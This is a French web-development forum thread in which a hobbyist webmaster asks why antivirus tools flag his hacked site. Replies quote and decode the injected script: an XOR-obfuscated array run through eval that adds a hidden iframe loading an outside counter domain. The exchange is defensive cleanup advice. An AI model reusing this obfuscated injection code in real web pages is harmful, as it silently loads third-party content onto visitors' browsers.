virus sur mon site?

virus sur mon site? - HTML/CSS - Programmation

Marsh Posté le 24-02-2010 à 16:50:26    

salut a tous
 
voila y'a quelque temps j'ai mis un script pour un compteur :
moralité ca a baissé grave la frequentation parce que les av des mecs détectaient un virus et en plus ca déclenchait automatiquement une page de pub  
 
je l'ai enlevé depuis ca continue alors que mon site est clean
 
une chose est sure avec mon av : avira il detecte rien mais j'ai vu une personne qui avait son av qui detectait un truc ,  moralité : elle a zappé.. :cry:  
 
c'etait avec ie  .. : le site : http://charlykane.fr/
et meme celui la http://www.showsanddjs.fr/ y'a une personne qui m'a dit que son av se declenchait  
 
qu'est ce qu'il faut faire pour que rien ne se declenche a chaque fois?
 
parce que pour le pekin moyen il cherche pas a comprendre il zappe et ca c'est pas bon pour mes sous..
 
merci a tous

Reply

Marsh Posté le 24-02-2010 à 16:50:26   

Reply

Marsh Posté le 24-02-2010 à 17:05:09    

supprime cette ligne  

Code :
  1. <script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86,90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,82,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,10,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,67,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89,82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,114,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,82,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jnyh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script>


---------------
Blablaté par Harko
Reply

Marsh Posté le 24-02-2010 à 18:29:34    

t'es hyper sympa gatsu
 
effectivement je me suis fait hacké dernièrement et quand j'essayais d'ouvrir mon site y'avait une page blanche dans la page source uniquement ce script  
j'ai tout remis mais j'ai oublié d'enlever ce script
 
merci encore
 
par contre juste par curiosité : ca veut dire quoi ce script et a quoi ca sert pour un hacker?
 
merci

Reply

Marsh Posté le 24-02-2010 à 20:18:43    

une fois décrypté le contenu de ce script est le suivant :  

Code :
  1. "fr=document.createElement('iframe'); fr.src="http://adcounters.net/far/show.php?s=eb31d196fc"; fr.style.display="none"; document.getElementsByTagName('body')[0].appendChild(fr); "


il fait ensuite un eval pour exécuter le code.
Pour résumer il appelle tout simplement une iframe vers un site de compteur.
A mon avis c'est un mec qui voulait faire grimper un compteur, et celui ci a hacké un paquet de sites. Mais comme cette page appelée dans une iframe a été détecté comme "mauvaise" tous les navigateurs on donnés une alerte.


---------------
Blablaté par Harko
Reply

Marsh Posté le 24-02-2010 à 20:28:17    

ah ouais il se fait de la pub gratos
 
toujours est il qu'il est arrivé a trouver le mot de passe qui permettait d'acceder a mes fichiers
 
merci ovh
 
va falloir que je protege mes files moi
 
j'ai entendu parler du fichier htaccess d'après ce que j'ai lu c'est le meilleur moyen de proteger efficacement ses dossiers?
 
merci encore t'as l'air d'un crack :)

Reply

Marsh Posté le 25-02-2010 à 02:03:01    

1) ça n'a rien à voir avec ovh.
 
2) j'aimerai savoir qui relaye cette info à propos du .htaccess parce qu'il doit bien se marrer en ce moment.

Reply

Marsh Posté le 25-02-2010 à 02:25:43    

1- Ton mot de passe doit être merdique et facilement trouvable par bruteforce
2- Tu as très bien pu avoir une faille grosse comme une maison sur ton site.
3- Ce n'est sûrement pas la faute d'ovh
4- l'info sur le .htaccess est juste n'importe quoi.
5- Tu ferais mieux aussi de vérifier si ton PC chez toi n'est pas remplis de virus et spywares de merde
6- Apprend les CSS car là c'est n'importe quoi :/


Message édité par gatsu35 le 25-02-2010 à 02:27:21

---------------
Blablaté par Harko
Reply

Marsh Posté le 25-02-2010 à 07:38:15    

ouais je me suis fait carrément jeter comme une merde la mais comme je sens que t'es un bon je ferme ma gueule..
 
pour le mot de passe on peut pas depasser les 8 caracteres donc c'est facilement trouvable (encore que il lui a fallu quand meme mettre un peu de temps mais bon) je l'ai quand meme fait avec passbox mais peut etre qu'il y a d'autres moyen d'en faire je vais voir ca..
 
pour le htaccess  je croyais que c'etait fiable (lesiteduzero dit bien qu'avec htaccess on peut proteger son site : http://www.siteduzero.com/tutoriel [...] ccess.html je croyais qu'ils etaient fiables mais bon ..)
 
le delire c'est que je ne connais pas de sites sur et puissant pour m'aider dans mon apprentissage  
y'a que lynda.com et lesiteduzero qui m'ont appris ce que je sais  
 
peut etre que ma syntaxe est merdique mais bon je suis un webmaster du dimanche je le sais mais le webamstering j'aime mais pas au point d'en faire mon metier pour tout dire je suis avant tout un musicos et j'ai appris avec ces deux sites..
 mes sites sont normaux sans plus ..
 
je vais suivre tous tes conseils parce que je sais quand on me critique et qu'on est naze mais la je sens que j'ai du taf c'est tout..
 
 
merci encore

Reply

Marsh Posté le 25-02-2010 à 08:16:19    

lesiteduzero a l'avantage d'annoncer la qualité de son contenu dans son intitulé :o

Reply

Marsh Posté le 25-02-2010 à 08:28:46    

theseeker a écrit :

ouais je me suis fait carrément jeter comme une merde la mais comme je sens que t'es un bon je ferme ma gueule..
 
pour le mot de passe on peut pas depasser les 8 caracteres donc c'est facilement trouvable (encore que il lui a fallu quand meme mettre un peu de temps mais bon) je l'ai quand meme fait avec passbox mais peut etre qu'il y a d'autres moyen d'en faire je vais voir ca..
 
pour le htaccess  je croyais que c'etait fiable (lesiteduzero dit bien qu'avec htaccess on peut proteger son site : http://www.siteduzero.com/tutoriel [...] ccess.html je croyais qu'ils etaient fiables mais bon ..)
 
le delire c'est que je ne connais pas de sites sur et puissant pour m'aider dans mon apprentissage  
y'a que lynda.com et lesiteduzero qui m'ont appris ce que je sais  
 
peut etre que ma syntaxe est merdique mais bon je suis un webmaster du dimanche je le sais mais le webamstering j'aime mais pas au point d'en faire mon metier pour tout dire je suis avant tout un musicos et j'ai appris avec ces deux sites..
 mes sites sont normaux sans plus ..
 
je vais suivre tous tes conseils parce que je sais quand on me critique et qu'on est naze mais la je sens que j'ai du taf c'est tout..
 
 
merci encore


Tu n'as rien compris du tout le sujet de l'article du site du zero.
L'article par de protéger un dossier avec un mot de passe, donc via un .htaccess.
 
Si tu fous un .htaccess avec protection de mot de passe sur la racine de ton site, devine ce qu'il va se passer  [:petrus75]  
 
Et le mot de passe que le gars a trouvé, c'est soit un mot de passe par FTP ou alors un MDP via un admin ovh.
 
Et stp : www.alsacreations.com
Merci


---------------
Blablaté par Harko
Reply

Marsh Posté le 25-02-2010 à 08:28:46   

Reply

Marsh Posté le 25-02-2010 à 08:36:50    

bon ok alsacreations c'est de la bombe  
je vais me lacher avec ca
 
merci

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed